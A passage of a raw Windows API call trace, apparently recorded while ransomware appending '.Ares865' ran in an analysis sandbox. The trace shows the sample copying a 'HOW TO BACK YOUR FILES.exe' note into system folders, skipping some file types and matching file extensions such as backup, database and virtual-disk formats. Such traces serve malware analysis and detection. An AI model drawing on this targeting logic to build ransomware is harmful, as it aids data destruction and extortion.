lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.148] CloseHandle (hObject=0x120) returned 1 [0090.148] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.148] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x63704b00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63704b00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.148] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.148] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.148] lstrcpyW (in: lpString1=0x2cce4ae, lpString2="confident.cov.Ares865" | out: lpString1="confident.cov.Ares865") returned="confident.cov.Ares865" [0090.148] lstrlenW (lpString="confident.cov.Ares865") returned 21 [0090.148] lstrlenW (lpString="Ares865") returned 7 [0090.148] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.148] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x636de9a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2d10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fyi.cov.Ares865", cAlternateFileName="")) returned 1 [0090.148] lstrcmpiW (lpString1="fyi.cov.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.148] lstrcmpiW (lpString1="fyi.cov.Ares865", lpString2="aoldtz.exe") returned 1 [0090.148] lstrcpyW (in: lpString1=0x2cce4ae, lpString2="fyi.cov.Ares865" | out: lpString1="fyi.cov.Ares865") returned="fyi.cov.Ares865" [0090.148] lstrlenW (lpString="fyi.cov.Ares865") returned 15 [0090.148] lstrlenW (lpString="Ares865") returned 7 [0090.148] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.148] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x63704b00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="generic.cov.Ares865", cAlternateFileName="")) returned 1 [0090.149] lstrcmpiW (lpString1="generic.cov.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.149] lstrcmpiW (lpString1="generic.cov.Ares865", lpString2="aoldtz.exe") returned 1 [0090.149] lstrcpyW (in: lpString1=0x2cce4ae, lpString2="generic.cov.Ares865" | out: lpString1="generic.cov.Ares865") returned="generic.cov.Ares865" [0090.149] lstrlenW (lpString="generic.cov.Ares865") returned 19 [0090.149] lstrlenW (lpString="Ares865") returned 7 [0090.149] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.149] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c3ae300, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.149] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.149] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x63704b00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2b90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="urgent.cov.Ares865", cAlternateFileName="")) returned 1 [0090.149] lstrcmpiW (lpString1="urgent.cov.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.149] lstrcmpiW (lpString1="urgent.cov.Ares865", lpString2="aoldtz.exe") returned 1 [0090.149] lstrcpyW (in: lpString1=0x2cce4ae, lpString2="urgent.cov.Ares865" | out: lpString1="urgent.cov.Ares865") returned="urgent.cov.Ares865" [0090.149] lstrlenW (lpString="urgent.cov.Ares865") returned 18 [0090.149] lstrlenW (lpString="Ares865") returned 7 [0090.149] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.149] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x63704b00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2b90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="urgent.cov.Ares865", cAlternateFileName="")) returned 0 [0090.149] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.149] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c10 [0090.149] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0090.149] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0090.149] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.149] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows nt\\msfax\\activitylog\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.150] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.150] GetLastError () returned 0x0 [0090.150] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.150] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.150] CloseHandle (hObject=0x120) returned 1 [0090.150] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.150] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.151] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.151] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.151] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender" [0090.151] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender" [0090.151] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.151] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.152] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.152] GetLastError () returned 0x0 [0090.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.152] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.152] CloseHandle (hObject=0x120) returned 1 [0090.152] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.152] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.152] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.152] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.152] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Definition Updates" | out: lpString1="Definition Updates") returned="Definition Updates" [0090.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0090.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa4) returned 0x2e2710 [0090.152] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c50 | out: ListHead=0x2e7710, ListEntry=0x2e7c50) returned 0x2e7c70 [0090.153] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c3ae300, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.153] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.153] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCopy", cAlternateFileName="LOCALC~1")) returned 1 [0090.153] lstrcmpiW (lpString1="LocalCopy", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.153] lstrcmpiW (lpString1="LocalCopy", lpString2="aoldtz.exe") returned 1 [0090.153] lstrcpyW (in: lpString1=0x2cce47e, lpString2="LocalCopy" | out: lpString1="LocalCopy") returned="LocalCopy" [0090.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0090.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x92) returned 0x334fc8 [0090.153] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0090.153] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Quarantine", cAlternateFileName="QUARAN~1")) returned 1 [0090.153] lstrcmpiW (lpString1="Quarantine", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.153] lstrcmpiW (lpString1="Quarantine", lpString2="aoldtz.exe") returned 1 [0090.153] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Quarantine" | out: lpString1="Quarantine") returned="Quarantine" [0090.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0090.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x335068 [0090.153] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0090.153] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c420720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c420720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Scans", cAlternateFileName="")) returned 1 [0090.153] lstrcmpiW (lpString1="Scans", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.153] lstrcmpiW (lpString1="Scans", lpString2="aoldtz.exe") returned 1 [0090.153] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Scans" | out: lpString1="Scans") returned="Scans" [0090.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0090.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8a) returned 0x320fc8 [0090.153] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7b30 [0090.153] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66843220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66843220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Support", cAlternateFileName="")) returned 1 [0090.153] lstrcmpiW (lpString1="Support", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.153] lstrcmpiW (lpString1="Support", lpString2="aoldtz.exe") returned 1 [0090.153] lstrcpyW (in: lpString1=0x2cce47e, lpString2="Support" | out: lpString1="Support") returned="Support" [0090.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0090.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8e) returned 0x321060 [0090.154] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7bf0 [0090.154] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66843220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66843220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Support", cAlternateFileName="")) returned 0 [0090.154] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.154] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0090.154] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Support", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Support") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Support" [0090.154] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Support" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Support") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Support" [0090.154] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.154] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Support\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\support\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.154] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.155] GetLastError () returned 0x0 [0090.155] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.155] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.155] CloseHandle (hObject=0x120) returned 1 [0090.155] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.155] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66843220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66843220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.155] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.155] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.155] lstrcpyW (in: lpString1=0x2cce48e, lpString2="MPLog-07132009-221054.log.Ares865" | out: lpString1="MPLog-07132009-221054.log.Ares865") returned="MPLog-07132009-221054.log.Ares865" [0090.155] lstrlenW (lpString="MPLog-07132009-221054.log.Ares865") returned 33 [0090.155] lstrlenW (lpString="Ares865") returned 7 [0090.155] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.155] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x666ec5c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x666ec5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x666ec5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPLog-09132019-235903.log", cAlternateFileName="MPLOG-~1.LOG")) returned 1 [0090.156] lstrcmpiW (lpString1="MPLog-09132019-235903.log", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.156] lstrcmpiW (lpString1="MPLog-09132019-235903.log", lpString2="aoldtz.exe") returned 1 [0090.156] lstrcpyW (in: lpString1=0x2cce48e, lpString2="MPLog-09132019-235903.log" | out: lpString1="MPLog-09132019-235903.log") returned="MPLog-09132019-235903.log" [0090.156] lstrlenW (lpString="MPLog-09132019-235903.log") returned 25 [0090.156] lstrlenW (lpString="Ares865") returned 7 [0090.156] lstrcmpiW (lpString1="903.log", lpString2="Ares865") returned -1 [0090.156] lstrlenW (lpString=".dll") returned 4 [0090.156] lstrcmpiW (lpString1="MPLog-09132019-235903.log", lpString2=".dll") returned 1 [0090.156] lstrlenW (lpString=".lnk") returned 4 [0090.156] lstrcmpiW (lpString1="MPLog-09132019-235903.log", lpString2=".lnk") returned 1 [0090.156] lstrlenW (lpString=".ini") returned 4 [0090.156] lstrcmpiW (lpString1="MPLog-09132019-235903.log", lpString2=".ini") returned 1 [0090.156] lstrlenW (lpString=".sys") returned 4 [0090.156] lstrcmpiW (lpString1="MPLog-09132019-235903.log", lpString2=".sys") returned 1 [0090.156] lstrlenW (lpString="MPLog-09132019-235903.log") returned 25 [0090.156] lstrlenW (lpString="bak") returned 3 [0090.156] lstrcmpiW (lpString1="log", lpString2="bak") returned 1 [0090.156] lstrlenW (lpString="ba_") returned 3 [0090.156] lstrcmpiW (lpString1="log", lpString2="ba_") returned 1 [0090.156] lstrlenW (lpString="dbb") returned 3 [0090.156] lstrcmpiW (lpString1="log", lpString2="dbb") returned 1 [0090.156] lstrlenW (lpString="vmdk") returned 4 [0090.156] lstrcmpiW (lpString1=".log", lpString2="vmdk") returned -1 [0090.156] lstrlenW (lpString="rar") returned 3 [0090.156] lstrcmpiW (lpString1="log", lpString2="rar") returned -1 [0090.156] lstrlenW (lpString="zip") returned 3 [0090.156] lstrcmpiW (lpString1="log", lpString2="zip") returned -1 [0090.156] lstrlenW (lpString="tgz") returned 3 [0090.156] lstrcmpiW (lpString1="log", lpString2="tgz") returned -1 [0090.156] lstrlenW (lpString="vbox") returned 4 [0090.156] lstrcmpiW (lpString1=".log", lpString2="vbox") returned -1 [0090.156] lstrlenW (lpString="vdi") returned 3 [0090.156] lstrcmpiW (lpString1="log", lpString2="vdi") returned -1 [0090.156] lstrlenW (lpString="vhd") returned 3 [0090.156] lstrcmpiW (lpString1="log", lpString2="vhd") returned -1 [0090.156] lstrlenW (lpString="vhdx") returned 4 [0090.157] lstrcmpiW (lpString1=".log", lpString2="vhdx") returned -1 [0090.157] lstrlenW (lpString="avhd") returned 4 [0090.157] lstrcmpiW (lpString1=".log", lpString2="avhd") returned -1 [0090.157] lstrlenW (lpString="db") returned 2 [0090.157] lstrcmpiW (lpString1="og", lpString2="db") returned 1 [0090.157] lstrlenW (lpString="db2") returned 3 [0090.157] lstrcmpiW (lpString1="log", lpString2="db2") returned 1 [0090.157] lstrlenW (lpString="db3") returned 3 [0090.157] lstrcmpiW (lpString1="log", lpString2="db3") returned 1 [0090.157] lstrlenW (lpString="dbf") returned 3 [0090.157] lstrcmpiW (lpString1="log", lpString2="dbf") returned 1 [0090.157] lstrlenW (lpString="mdf") returned 3 [0090.157] lstrcmpiW (lpString1="log", lpString2="mdf") returned -1 [0090.157] lstrlenW (lpString="mdb") returned 3 [0090.157] lstrcmpiW (lpString1="log", lpString2="mdb") returned -1 [0090.157] lstrlenW (lpString="sql") returned 3 [0090.157] lstrcmpiW (lpString1="log", lpString2="sql") returned -1 [0090.157] lstrlenW (lpString="sqlite") returned 6 [0090.157] lstrcmpiW (lpString1="03.log", lpString2="sqlite") returned -1 [0090.157] lstrlenW (lpString="sqlite3") returned 7 [0090.157] lstrcmpiW (lpString1="903.log", lpString2="sqlite3") returned -1 [0090.157] lstrlenW (lpString="sqlitedb") returned 8 [0090.157] lstrcmpiW (lpString1="5903.log", lpString2="sqlitedb") returned -1 [0090.157] lstrlenW (lpString="xml") returned 3 [0090.157] lstrcmpiW (lpString1="log", lpString2="xml") returned -1 [0090.157] lstrlenW (lpString="$er") returned 3 [0090.157] lstrcmpiW (lpString1="log", lpString2="$er") returned 1 [0090.157] lstrlenW (lpString="4dd") returned 3 [0090.157] lstrcmpiW (lpString1="log", lpString2="4dd") returned 1 [0090.157] lstrlenW (lpString="4dl") returned 3 [0090.157] lstrcmpiW (lpString1="log", lpString2="4dl") returned 1 [0090.157] lstrlenW (lpString="^^^") returned 3 [0090.157] lstrcmpiW (lpString1="log", lpString2="^^^") returned 1 [0090.157] lstrlenW (lpString="abs") returned 3 [0090.157] lstrcmpiW (lpString1="log", lpString2="abs") returned 1 [0090.157] lstrlenW (lpString="abx") returned 3 [0090.157] lstrcmpiW (lpString1="log", lpString2="abx") returned 1 [0090.157] lstrlenW 